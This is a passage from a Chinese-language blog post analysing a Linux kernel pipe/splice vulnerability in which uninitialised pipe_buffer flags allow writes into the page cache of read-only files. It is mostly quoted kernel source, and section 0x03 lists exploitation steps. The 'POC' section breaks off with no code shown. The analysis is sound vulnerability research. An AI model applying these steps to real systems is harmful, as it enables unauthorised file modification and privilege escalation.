编辑
2023-06-01
CVE
00
请注意,本文编写于 673 天前,最后修改于 647 天前,其中某些信息可能已经过时。

目录

0x00 相关知识解析
PIPE
Splice
0x01 相关结构体解析
pipe_buffer
pipinodeinfo
iov_iter
0x02 相关函数解析
管道创建
pipe()
dopipe_flags()
createpipefiles()
getpipeinode()
allocpipeinfo()
管道读
pipe_read()
copypageto_iter()
copypagetoiterpipe()
copytoiter()
copypipeto_iter()
push_pipe()
管道写
pipe_write()
Splice
do_splice()
dospliceto()
splice_read()
genericfilesplice_read()
callreaditer()
read_iter()
ext4fileread_iter()
genericfileread_iter()
genericfilebuffered_read()
0x03 漏洞分析
0x04 漏洞利用
POC
提权

这调用链 麻了

0x00 相关知识解析


PIPE

众所周知 在Linux中 近乎所有东西都是以文件的形式存在的 管道也不例外 在Linux内核中 管道本质上是创建了一个虚拟的inode结点 在节点上存放数据的是pipe_inode_info结构体

当创建一个管道时 内核会创建一个VFS inode 一个pipe_inode_info结构体 两个文件描述符(表示管道的两端) 一个pipe_buffer结构体数组

Splice

对于文件之间的copy 最直接的方法就是直接打开两个文件 然后对着copy就好了 当然一般直接的方法都比较烂.. 这样做虽然简单 但是会打来大量的系统开销 因为需要频繁的将数据从用户态传递到内核态 然后在将数据从内核态传递到用户态来回进行数据拷贝

因此为了减少这样的系统开销所以诞生了splice 其作用是在两个文件描述符之间进行copy 但是这个拷贝过程是不经过用户态的 其本质是利用管道在内核空间中进行数据拷贝

当数据想要从一个文件描述符拷贝到另一个文件描述符中时 只需要先创建一个管道 之后使用splice将数据从源文件描述符拷贝到管道中 然后再调用splice将数据从管道拷贝到目的文件操作符中即可 这样所有数据的拷贝都在内核空间完成

0x01 相关结构体解析


pipe_buffer
c
// include/linux/pipe_fs_i.h /* pipe_buffer结构体存放着实际管道中存放的数据 */ // flags #define PIPE_DEF_BUFFERS 16 #define PIPE_BUF_FLAG_LRU 0x01 /* page is on the LRU */ #define PIPE_BUF_FLAG_ATOMIC 0x02 /* was atomically mapped */ #define PIPE_BUF_FLAG_GIFT 0x04 /* page is a gift */ #define PIPE_BUF_FLAG_PACKET 0x08 /* read() as a packet */ #define PIPE_BUF_FLAG_CAN_MERGE 0x10 /* can merge buffers */ #define PIPE_BUF_FLAG_WHOLE 0x20 /* read() must return entire buffer or error */ #ifdef CONFIG_WATCH_QUEUE #define PIPE_BUF_FLAG_LOSS 0x40 /* Message loss happened after this buffer */ #endif /** * struct pipe_buffer - a linux kernel pipe buffer * @page: the page containing the data for the pipe buffer * @offset: offset of data inside the @page * @len: length of data inside the @page * @ops: operations associated with this buffer. See @pipe_buf_operations. * @flags: pipe buffer flags. See above. * @private: private data owned by the ops. **/ struct pipe_buffer { struct page *page; // 当前pipe_buffer所对应的page unsigned int offset, len; // 数据在页中的偏移,长度 const struct pipe_buf_operations *ops; // 与该缓冲区相关联的操作 与本文无关 unsigned int flags; // flags unsigned long private; // 属于关联操作的私有data };
pip_inode_info
c
// include/linux/pipe_fs_i.h /** * struct pipe_inode_info - a linux kernel pipe * @mutex: mutex protecting the whole thing * @rd_wait: reader wait point in case of empty pipe * @wr_wait: writer wait point in case of full pipe * @head: The point of buffer production * @tail: The point of buffer consumption * @note_loss: The next read() should insert a data-lost message * @max_usage: The maximum number of slots that may be used in the ring * @ring_size: total number of buffers (should be a power of 2) * @nr_accounted: The amount this pipe accounts for in user->pipe_bufs * @tmp_page: cached released page * @readers: number of current readers of this pipe * @writers: number of current writers of this pipe * @files: number of struct file referring this pipe (protected by ->i_lock) * @r_counter: reader counter * @w_counter: writer counter * @fasync_readers: reader side fasync * @fasync_writers: writer side fasync * @bufs: the circular array of pipe buffers * @user: the user who created this pipe * @watch_queue: If this pipe is a watch_queue, this is the stuff for that **/ struct pipe_inode_info { struct mutex mutex; // 信号量 保证互斥操作 wait_queue_head_t rd_wait, wr_wait; // 等待读取的队列 等待写入的队列 有点类似生产者问题 因为管道空而不能读 因为管道满而不能写 unsigned int head; // 管道的起始指针 unsigned int tail; // 管道的结束指针 unsigned int max_usage; // 最大可用pipe_buffer数量 unsigned int ring_size; // 当前已分配的pipe_buffer个数 #ifdef CONFIG_WATCH_QUEUE bool note_loss; #endif unsigned int nr_accounted; unsigned int readers; // 当前管道的读者数量 unsigned int writers; // 当前管道的写者数量 unsigned int files; // unsigned int r_counter; unsigned int w_counter; struct page *tmp_page; struct fasync_struct *fasync_readers; struct fasync_struct *fasync_writers; struct pipe_buffer *bufs; // 存放多个pipe_buffer的数组 struct user_struct *user; #ifdef CONFIG_WATCH_QUEUE struct watch_queue *watch_queue; #endif };
iov_iter
c
// include/linux/uio.h /* iov_iter结构体用于迭代被分为多个页的数据 -> 用于迭代一个个页面 */ enum iter_type { /* iter types */ ITER_IOVEC = 4, ITER_KVEC = 8, ITER_BVEC = 16, ITER_PIPE = 32, // 当前迭代的数据为某个pipe中的数据 ITER_DISCARD = 64, // 写入当前iov_iter的数据全部丢弃 }; struct iov_iter { /* * Bit 0 is the read/write bit, set if we're writing. * Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and * the caller isn't expecting to drop a page reference when done. */ unsigned int type; // 当前迭代的数据来自于什么结构 size_t iov_offset; // 当前迭代到page的相对偏移 读写将从该page的这个相对偏移开始 size_t count; // 可读写数组字节大小 union { const struct iovec *iov; const struct kvec *kvec; const struct bio_vec *bvec; struct pipe_inode_info *pipe; }; union { unsigned long nr_segs; struct { unsigned int head; unsigned int start_head; }; }; };

0x02 相关函数解析


管道创建

pipe()

创建管道使用的是pipe()系统调用 但是实际上在Kernel层面调用的是do_pipe2()

c
// fs/pipe.c static int do_pipe2(int __user *fildes, int flags) { struct file *files[2]; int fd[2]; int error; error = __do_pipe_flags(fd, files, flags); if (!error) { if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) { fput(files[0]); fput(files[1]); put_unused_fd(fd[0]); put_unused_fd(fd[1]); error = -EFAULT; } else { fd_install(fd[0], files[0]); fd_install(fd[1], files[1]); } } return error; }

可以看到实际上调用的是__do_pipe_flags()

__do_pipe_flags()
c
static int __do_pipe_flags(int *fd, struct file **files, int flags) { int error; int fdw, fdr; if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE)) return -EINVAL; error = create_pipe_files(files, flags); if (error) return error; error = get_unused_fd_flags(flags); ... }
create_pipe_files()
c
int create_pipe_files(struct file **res, int flags) { struct inode *inode = get_pipe_inode(); struct file *f; int error; if (!inode) return -ENFILE; ... }
get_pipe_inode()
c
static struct inode * get_pipe_inode(void) { struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb); struct pipe_inode_info *pipe; if (!inode) goto fail_inode; inode->i_ino = get_next_ino(); pipe = alloc_pipe_info(); if (!pipe) goto fail_iput; ... }
alloc_pipe_info()
c
struct pipe_inode_info *alloc_pipe_info(void) { struct pipe_inode_info *pipe; unsigned long pipe_bufs = PIPE_DEF_BUFFERS; struct user_struct *user = get_current_user(); unsigned long user_bufs; unsigned int max_size = READ_ONCE(pipe_max_size); pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT); if (pipe == NULL) goto out_free_uid; ... pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT); if (pipe->bufs) { init_waitqueue_head(&pipe->rd_wait); init_waitqueue_head(&pipe->wr_wait); pipe->r_counter = pipe->w_counter = 1; pipe->max_usage = pipe_bufs; pipe->ring_size = pipe_bufs; pipe->nr_accounted = pipe_bufs; pipe->user = user; mutex_init(&pipe->mutex); return pipe; } ... }

可以看到最后先调用了kzalloc()分配了一个pipe_inode_info结构体 然后调用``kcalloc()分配了PIPE_DEF_BUFFERS(16)pipe_buf 然后挂载到pipe_inode_info -> bufs`上

至此 pipe的创建流程已经走完 调用链为pipe() -> do_pipe2() -> __do_pipe_flags() -> create_pipe_files() -> get_pipe_inode() -> alloc_pipe_info()

管道读

在同文件中有一个file_operations函数表 可以看到对于pipe的读操作是调用pipe_read()实现的

c
const struct file_operations pipefifo_fops = { .open = fifo_open, .llseek = no_llseek, .read_iter = pipe_read, .write_iter = pipe_write, .poll = pipe_poll, .unlocked_ioctl = pipe_ioctl, .release = pipe_release, .fasync = pipe_fasync, .splice_write = iter_file_splice_write, };
pipe_read()

相关函数定义为

c
// fs/pipe.c static ssize_t pipe_read(struct kiocb *iocb, struct iov_iter *to)

其中两个参数

  • Iocb: 存放当前pipe结构体的指针
  • to: 从管道中读出的数据将要存放到哪里

首先是调用iov_iter_count(to)来获取读取的字节数 并且从iocb中获取到pipe_inode_info结构体 如果读取的字节数为0 则直接退出

c
size_t total_len = iov_iter_count(to); struct file *filp = iocb->ki_filp; struct pipe_inode_info *pipe = filp->private_data; bool was_full, wake_next_reader = false; ssize_t ret; /* Null read succeeds. */ if (unlikely(total_len == 0)) return 0; ret = 0; __pipe_lock(pipe);

然后判断管道是否已满 如果pipe->head - pipe->tail >= pipe->max_usage则管道已满

c
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);

接下来就是循环读 将pipe中的内容读到``to->pipe`中

c
for (;;) { unsigned int head = pipe->head; unsigned int tail = pipe->tail; unsigned int mask = pipe->ring_size - 1; if (!pipe_empty(head, tail)) { struct pipe_buffer *buf = &pipe->bufs[tail & mask]; size_t chars = buf->len; size_t written; int error; if (chars > total_len) { if (buf->flags & PIPE_BUF_FLAG_WHOLE) { if (ret == 0) ret = -ENOBUFS; break; } chars = total_len; } error = pipe_buf_confirm(pipe, buf); if (error) { if (!ret) ret = error; break; } written = copy_page_to_iter(buf->page, buf->offset, chars, to); if (unlikely(written < chars)) { if (!ret) ret = -EFAULT; break; } ret += chars; buf->offset += chars; buf->len -= chars; /* Was it a packet buffer? Clean up and exit */ if (buf->flags & PIPE_BUF_FLAG_PACKET) { total_len = chars; buf->len = 0; } if (!buf->len) { pipe_buf_release(pipe, buf); spin_lock_irq(&pipe->rd_wait.lock); tail++; pipe->tail = tail; spin_unlock_irq(&pipe->rd_wait.lock); } total_len -= chars; if (!total_len) break; /* common path: read succeeded */ if (!pipe_empty(head, tail)) /* More to do? */ continue; } if (!pipe->writers) break; if (ret) break; if (filp->f_flags & O_NONBLOCK) { ret = -EAGAIN; break; } __pipe_unlock(pipe); /* * We only get here if we didn't actually read anything. * * However, we could have seen (and removed) a zero-sized * pipe buffer, and might have made space in the buffers * that way. * * You can't make zero-sized pipe buffers by doing an empty * write (not even in packet mode), but they can happen if * the writer gets an EFAULT when trying to fill a buffer * that already got allocated and inserted in the buffer * array. * * So we still need to wake up any pending writers in the * _very_ unlikely case that the pipe was full, but we got * no data. */ if (unlikely(was_full)) { wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM); kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT); } /* * But because we didn't read anything, at this point we can * just return directly with -ERESTARTSYS if we're interrupted, * since we've done any required wakeups and there's no need * to mark anything accessed. And we've dropped the lock. */ if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0) return -ERESTARTSYS; __pipe_lock(pipe); was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage); wake_next_reader = true; }

最后做一些判断 然后返回读入字节数

c
if (was_full) { wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM); kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT); } if (wake_next_reader) wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM); if (ret > 0) file_accessed(filp); return ret;
copy_page_to_iter()

还是先来看下函数定义

c
// lib/iov_iter.c size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes, struct iov_iter *i)
  • Page: 原页面
  • Offset: 数据在页面中的偏移
  • Bytes: 读取的字节数
  • i: 目的地址

整体函数实现非常短 根据不同的iov_iter类型 执行不同的copy方式 这里我们主要关注的是pipe的copy方式

c
if (unlikely(!page_copy_sane(page, offset, bytes))) return 0; if (i->type & (ITER_BVEC|ITER_KVEC)) { void *kaddr = kmap_atomic(page); size_t wanted = copy_to_iter(kaddr + offset, bytes, i); kunmap_atomic(kaddr); return wanted; } else if (unlikely(iov_iter_is_discard(i))) return bytes; else if (likely(!iov_iter_is_pipe(i))) return copy_page_to_iter_iovec(page, offset, bytes, i); else return copy_page_to_iter_pipe(page, offset, bytes, i);
copy_page_to_iter_pipe()

整体实现也很短而且好理解

c
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes, struct iov_iter *i) { struct pipe_inode_info *pipe = i->pipe; // 获取pipe_inode_info结构体 struct pipe_buffer *buf; // 获取相关的pipe描述相关数据 unsigned int p_tail = pipe->tail; unsigned int p_mask = pipe->ring_size - 1; unsigned int i_head = i->head; size_t off; if (unlikely(bytes > i->count)) // 如果读取的字节数大于pipe最大数据量 bytes = i->count; if (unlikely(!bytes)) return 0; if (!sanity(i)) return 0; off = i->iov_offset; // 待写入的偏移 buf = &pipe->bufs[i_head & p_mask]; // 获取pipe中的buf if (off) { if (offset == off && buf->page == page) { // 如果读取和写入的是同一页 同一位置 /* merge with the last one */ buf->len += bytes; i->iov_offset += bytes; goto out; } i_head++; buf = &pipe->bufs[i_head & p_mask]; } if (pipe_full(i_head, p_tail, pipe->max_usage)) // pipe满则直接返回 return 0; buf->ops = &page_cache_pipe_buf_ops; get_page(page); // 增加该页的refcount buf->page = page; // 直接引用该页 buf->offset = offset; buf->len = bytes; pipe->head = i_head + 1; i->iov_offset = offset + bytes; i->head = i_head; out: i->count -= bytes; return bytes; }

很显然 对于接收方来说 复制就是直接引用需要复制的页面 并且记录页面的offset len等数据 这样做的好处是降低了性能开销 毕竟io是需要时间的 但是赋值近乎不需要

当然因为这里接收方式直接引用的其他页面 所以必须保证在写入的时候不会将数据写入到这种页面中 另外我们可以发现在page复制到pipe_buffer中时 几乎所有的pipe相关的数据都被重新赋值了 除了flags

copy_to_iter()

对于pipe的数据传递 除了pipe_read() -> copy_page_to_iter() -> copy_page_to_iter_pipe()的调用链之外 copy_to_iter()也可以实现类似的功能

c
// include/linux/uio.h size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i) { if (unlikely(!check_copy_size(addr, bytes, true))) return 0; else return _copy_to_iter(addr, bytes, i); }
c
// lib/iov_iter.c /* addr: 源地址 bytes: 复制字节数 i: iov_iter指针 */ size_t _copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i) { const char *from = addr; if (unlikely(iov_iter_is_pipe(i))) return copy_pipe_to_iter(addr, bytes, i); if (iter_is_iovec(i)) might_fault(); iterate_and_advance(i, bytes, v, copyout(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len), memcpy_to_page(v.bv_page, v.bv_offset, (from += v.bv_len) - v.bv_len, v.bv_len), memcpy(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len) ) return bytes; }

当然 可以发现最后针对pipe类型还是调用的copy_pipe_to_iter() 所以针对pipe的数据传递还有一条调用链为copy_to_iter() -> _copy_to_iter() -> copy_pipe_to_iter()

copy_pipe_to_iter()
c
// lib/iov_iter.c static size_t copy_pipe_to_iter(const void *addr, size_t bytes, struct iov_iter *i) { struct pipe_inode_info *pipe = i->pipe; // 获取pipe_inode_info结构体 unsigned int p_mask = pipe->ring_size - 1; unsigned int i_head; size_t n, off; if (!sanity(i)) return 0; // 下文详解 bytes = n = push_pipe(i, bytes, &i_head, &off); if (unlikely(!n)) return 0; do { size_t chunk = min_t(size_t, n, PAGE_SIZE - off); memcpy_to_page(pipe->bufs[i_head & p_mask].page, off, addr, chunk); // 直接copy i->head = i_head; i->iov_offset = off + chunk; n -= chunk; addr += chunk; off = 0; i_head++; } while (n); i->count -= bytes; // 修改当前iov_iter待写入的大小 return bytes; }
push_pipe()
c
// lib/iov_iter.c static size_t push_pipe(struct iov_iter *i, size_t size, int *iter_headp, size_t *offp) { struct pipe_inode_info *pipe = i->pipe; // 获取pipe_inode_info结构体 unsigned int p_tail = pipe->tail; unsigned int p_mask = pipe->ring_size - 1; unsigned int iter_head; size_t off; ssize_t left; // check if (unlikely(size > i->count)) size = i->count; if (unlikely(!size)) return 0; left = size; data_start(i, &iter_head, &off); // 获取pipe的head和起始offset *iter_headp = iter_head; *offp = off; // 如果是从页面中间的位置开始写 if (off) { left -= PAGE_SIZE - off; // left - (PAGE_SIZE - off) 判断剩余位置是否够写 if (left <= 0) { pipe->bufs[iter_head & p_mask].len += size; // 如果够写就返回 return size; } pipe->bufs[iter_head & p_mask].len = PAGE_SIZE; // 如果不够就扩充到PAGE_SIZE iter_head++; } // 循环扩充pipe_buffer while (!pipe_full(iter_head, p_tail, pipe->max_usage)) { struct pipe_buffer *buf = &pipe->bufs[iter_head & p_mask]; // 获取pipe_buffer struct page *page = alloc_page(GFP_USER); if (!page) break; // 对于pipe_buffer的属性进行初始化 buf->ops = &default_pipe_buf_ops; buf->page = page; buf->offset = 0; buf->len = min_t(ssize_t, left, PAGE_SIZE); left -= buf->len; iter_head++; pipe->head = iter_head; if (left == 0) return size; } return size - left; }

注意 此处当Kernel循环扩充pipe_buffer时跟copy_page_to_iter_pipe()一样 漏掉了pipe_bufferflag字段

管道写

根据pipefifo_fops得知 对于管道的写操作是调用pipe_write实现的

c
const struct file_operations pipefifo_fops = { .open = fifo_open, .llseek = no_llseek, .read_iter = pipe_read, .write_iter = pipe_write, .poll = pipe_poll, .unlocked_ioctl = pipe_ioctl, .release = pipe_release, .fasync = pipe_fasync, .splice_write = iter_file_splice_write, };
pipe_write()
c
// fs/pipe.c static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from) { struct file *filp = iocb->ki_filp; struct pipe_inode_info *pipe = filp->private_data; unsigned int head; ssize_t ret = 0; size_t total_len = iov_iter_count(from); ssize_t chars; bool was_empty = false; bool wake_next_writer = false; /* Null write succeeds. */ if (unlikely(total_len == 0)) return 0; __pipe_lock(pipe); // 如果pipe没有读者则返回 if (!pipe->readers) { send_sig(SIGPIPE, current, 0); ret = -EPIPE; goto out; } #ifdef CONFIG_WATCH_QUEUE if (pipe->watch_queue) { ret = -EXDEV; goto out; } #endif /* * 只有当管道开始变空时才唤醒writers 因为除此之外的情况只有没有读者在等待 * 如果其不为空 则我们尝试将新数据合并到最后一个buffer中 * 这自然合并了小的数据写入 并且也会对跨越多个page的大数据写入实现页面对齐 * * 说人话: 优先写入未满的页面 除非未满页面不允许写入再开新页面 */ head = pipe->head; // 获取队列头 was_empty = pipe_empty(head, pipe->tail); chars = total_len & (PAGE_SIZE-1); // 如果pipe_buffer非空且pipe_buffer没有写满 if (chars && !was_empty) { unsigned int mask = pipe->ring_size - 1; struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask]; // 获取上一个pipe_buffer int offset = buf->offset + buf->len; if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && // 如果上个pipe_buffer设置了PIPE_BUF_FLAG_CAN_MERGE标志位且写完大小小于等于PAGE_SIZE 则直接写入 offset + chars <= PAGE_SIZE) { ret = pipe_buf_confirm(pipe, buf); if (ret) goto out; ret = copy_page_from_iter(buf->page, offset, chars, from); if (unlikely(ret < chars)) { ret = -EFAULT; goto out; } buf->len += ret; if (!iov_iter_count(from)) goto out; } } // 剩余数据写入 for (;;) { if (!pipe->readers) { // 没有读者直接返回 send_sig(SIGPIPE, current, 0); if (!ret) ret = -EPIPE; break; } head = pipe->head; if (!pipe_full(head, pipe->tail, pipe->max_usage)) { // 如果管道没满 正常写入 unsigned int mask = pipe->ring_size - 1; struct pipe_buffer *buf = &pipe->bufs[head & mask]; struct page *page = pipe->tmp_page; int copied; if (!page) { // 如果没有准备tmp_page则分配 page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT); if (unlikely(!page)) { ret = ret ? : -ENOMEM; break; } pipe->tmp_page = page; } /* * 提前在环中分配一个 slot,并附加一个空 buffer。 * 若我们出错或未能使用它,它会被读者所使用, */ spin_lock_irq(&pipe->rd_wait.lock); head = pipe->head; if (pipe_full(head, pipe->tail, pipe->max_usage)) { // 管道满 开启下一次循环 spin_unlock_irq(&pipe->rd_wait.lock); continue; } pipe->head = head + 1; spin_unlock_irq(&pipe->rd_wait.lock); /* 将其插入buffer array */ buf = &pipe->bufs[head & mask]; buf->page = page; buf->ops = &anon_pipe_buf_ops; buf->offset = 0; buf->len = 0; if (is_packetized(filp)) // 设置pipe_buffer的flag 如果pipe_inode_info的f_flags设置了O_DIRECT 则flag设置为PIPE_BUF_FLAG_PACKET buf->flags = PIPE_BUF_FLAG_PACKET; else buf->flags = PIPE_BUF_FLAG_CAN_MERGE; pipe->tmp_page = NULL; copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); // 将数据copy到对应页面上 if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) { if (!ret) ret = -EFAULT; break; } ret += copied; buf->offset = 0; buf->len = copied; if (!iov_iter_count(from)) // 判断是否结束 break; } if (!pipe_full(head, pipe->tail, pipe->max_usage)) continue; // 等待buffer空间可用 if (filp->f_flags & O_NONBLOCK) { if (!ret) ret = -EAGAIN; break; } if (signal_pending(current)) { if (!ret) ret = -ERESTARTSYS; break; } // 锁相关操作 __pipe_unlock(pipe); if (was_empty) { wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM); kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN); } wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe)); __pipe_lock(pipe); was_empty = pipe_empty(pipe->head, pipe->tail); wake_next_writer = true; } out: if (pipe_full(pipe->head, pipe->tail, pipe->max_usage)) wake_next_writer = false; __pipe_unlock(pipe); if (was_empty) { wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM); kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN); } if (wake_next_writer) wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM); if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) { int err = file_update_time(filp); if (err) ret = err; sb_end_write(file_inode(filp)->i_sb); } return ret; }

Splice

pipe()差不多 虽然在常规状态下调用splice使用的是splice()系统调用 但是其背后实现是内核中的do_splice()

c
#include <fcntl.h> ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);
do_splice()

这里会进行分辨 是pipe2pipe拷贝 pipe2file拷贝还是file2pipe拷贝或者是file2file拷贝 然后流入不同的函数 这里我们重点关注file2pipe

c
// fs/splice.c long do_splice(struct file *in, loff_t *off_in, struct file *out, loff_t *off_out, size_t len, unsigned int flags) { struct pipe_inode_info *ipipe; struct pipe_inode_info *opipe; loff_t offset; long ret; // 读写权限判断 if (unlikely(!(in->f_mode & FMODE_READ) || !(out->f_mode & FMODE_WRITE))) return -EBADF; // 从file中获取到pipe_inode_info结构体 ipipe = get_pipe_info(in, true); opipe = get_pipe_info(out, true); if (ipipe && opipe) { // pipe to pipe ... return splice_pipe_to_pipe(ipipe, opipe, len, flags); } if (ipipe) { // pipe to file ... ret = do_splice_from(ipipe, out, &offset, len, flags); ... return ret; } if (opipe) { // file to pipe // pipe和文件校验 if (off_out) return -ESPIPE; if (off_in) { if (!(in->f_mode & FMODE_PREAD)) return -EINVAL; offset = *off_in; } else { offset = in->f_pos; } if (out->f_flags & O_NONBLOCK) flags |= SPLICE_F_NONBLOCK; pipe_lock(opipe); // 等待pipe空位 ret = wait_for_space(opipe, flags); if (!ret) { unsigned int p_space; // 获取传递数据大小 /* Don't try to read more the pipe has space for. */ p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail); len = min_t(size_t, len, p_space << PAGE_SHIFT); // 下文详解 ret = do_splice_to(in, &offset, opipe, len, flags); } pipe_unlock(opipe); if (ret > 0) wakeup_pipe_readers(opipe); if (!off_in) in->f_pos = offset; else *off_in = offset; return ret; } return -EINVAL; }
do_splice_to()

整体流程还是比较短 其实大部分都是在做数据校验 然后根据文件类型调用对应文件类型的函数调用表中的splice_read()

c
// fs/splice.c static long do_splice_to(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { int ret; if (unlikely(!(in->f_mode & FMODE_READ))) return -EBADF; ret = rw_verify_area(READ, in, ppos, len); if (unlikely(ret < 0)) return ret; if (unlikely(len > MAX_RW_COUNT)) len = MAX_RW_COUNT; if (unlikely(!in->f_op->splice_read)) return warn_unsupported(in, "read"); return in->f_op->splice_read(in, ppos, pipe, len, flags); }
splice_read()

这里以最常见的ext4文件类型举例 可以查询到对应的函数调用表 可以看到最后是调用了generic_file_splice_read()

c
// fs/ext4/file.c const struct file_operations ext4_file_operations = { .llseek = ext4_llseek, .read_iter = ext4_file_read_iter, .write_iter = ext4_file_write_iter, .iopoll = iomap_dio_iopoll, .unlocked_ioctl = ext4_ioctl, .mmap = ext4_file_mmap, .mmap_supported_flags = MAP_SYNC, .open = ext4_file_open, .release = ext4_release_file, .fsync = ext4_sync_file, .get_unmapped_area = thp_get_unmapped_area, .splice_read = generic_file_splice_read, .splice_write = iter_file_splice_write, .fallocate = ext4_fallocate, };
generic_file_splice_read()

可以看到该函数还是进行一些基础操作 创建结构体什么的 然后调用call_read_iter()进行操作

c
// fs/splice.c ssize_t generic_file_splice_read(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { struct iov_iter to; struct kiocb kiocb; unsigned int i_head; int ret; iov_iter_pipe(&to, READ, pipe, len); // 根据pipe创建iov_iter结构体 i_head = to.head; init_sync_kiocb(&kiocb, in); // 创建kiocb结构体 kiocb.ki_pos = *ppos; ret = call_read_iter(in, &kiocb, &to); // 下文详解 if (ret > 0) { // 正常传输 *ppos = kiocb.ki_pos; file_accessed(in); // 更新状态 } else if (ret < 0) { // 传输失败 to.head = i_head; to.iov_offset = 0; iov_iter_advance(&to, 0); /* to free what was emitted */ /* * callers of ->splice_read() expect -EAGAIN on * "can't put anything in there", rather than -EFAULT. */ if (ret == -EFAULT) ret = -EAGAIN; } return ret; }
call_read_iter()

最后又是调用对应文件类型的read_iter

c
// include/linux/fs.h static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio, struct iov_iter *iter) { return file->f_op->read_iter(kio, iter); }
read_iter()

根据之前的函数调用表可以看到read_iter()调用的是ext4_file_read_iter()

c
// fs/ext4/file.c const struct file_operations ext4_file_operations = { .llseek = ext4_llseek, .read_iter = ext4_file_read_iter, .write_iter = ext4_file_write_iter, .iopoll = iomap_dio_iopoll, .unlocked_ioctl = ext4_ioctl, .mmap = ext4_file_mmap, .mmap_supported_flags = MAP_SYNC, .open = ext4_file_open, .release = ext4_release_file, .fsync = ext4_sync_file, .get_unmapped_area = thp_get_unmapped_area, .splice_read = generic_file_splice_read, .splice_write = iter_file_splice_write, .fallocate = ext4_fallocate, };
ext4_file_read_iter()
c
// fs/ext4/file.c static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to) { struct inode *inode = file_inode(iocb->ki_filp); if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb)))) return -EIO; if (!iov_iter_count(to)) return 0; /* skip atime */ if (iocb->ki_flags & IOCB_DIRECT) return ext4_dio_read_iter(iocb, to); // 没设置IOCB_DIRECT流入这里 return generic_file_read_iter(iocb, to); }
generic_file_read_iter()
c
// mm/filemap.c ssize_t generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter) { size_t count = iov_iter_count(iter); ssize_t retval = 0; ... retval = generic_file_buffered_read(iocb, iter, retval); out: return retval; }
generic_file_buffered_read()

代码量太大了 简单讲下功能吧

c
ssize_t generic_file_buffered_read(struct kiocb *iocb, struct iov_iter *iter, ssize_t written) { struct file *filp = iocb->ki_filp; struct file_ra_state *ra = &filp->f_ra; struct address_space *mapping = filp->f_mapping; struct inode *inode = mapping->host; struct page *pages_onstack[PAGEVEC_SIZE], **pages = NULL; unsigned int nr_pages = min_t(unsigned int, 512, ((iocb->ki_pos + iter->count + PAGE_SIZE - 1) >> PAGE_SHIFT) - (iocb->ki_pos >> PAGE_SHIFT)); int i, pg_nr, error = 0; bool writably_mapped; loff_t isize, end_offset; if (unlikely(iocb->ki_pos >= inode->i_sb->s_maxbytes)) return 0; if (unlikely(!iov_iter_count(iter))) return 0; ... copied = copy_page_to_iter(pages[i], offset, bytes, iter); ... }
  • 尝试在该文件已有的文件缓存映射表中查找之前已经映射过的文件缓存页
    • 如果没有缓存 则读取文件 创建缓存
    • 如果有缓存但是缓存过期了 则更新缓存
  • 调用copy_page_to_iter()将文件缓存页中的数据拷贝进pipe中

至此整体已经和之前pipe相关的函数链接上了

0x03 漏洞分析


根据前面的分析基本上漏洞思路很明晰了

  • 创建一个管道 注意不需要O_DIRECT标志
  • 往管道内写入大量数据 耗尽所有pipe_buffer 此时根据pipe_write中的调用 所有pipe_buffer的flag为PIPE_BUF_FLAG_CAN_MERGE
  • 将所有数据读出 释放pipe_buffer
  • 使用splice读入一个文件 要求此文件大小与页面不对齐 生成文件缓存页
  • 直接向管道中写入数据 因为PIPE_BUF_FLAG_CAN_MERGE的原因 Kernel会将数据写入到文件缓存页中
  • 至此完成了越权写的操作

主要漏洞原因是未对pipe_buffer的标志位进行初始化造成的

0x04 漏洞利用


POC

POC如下

c
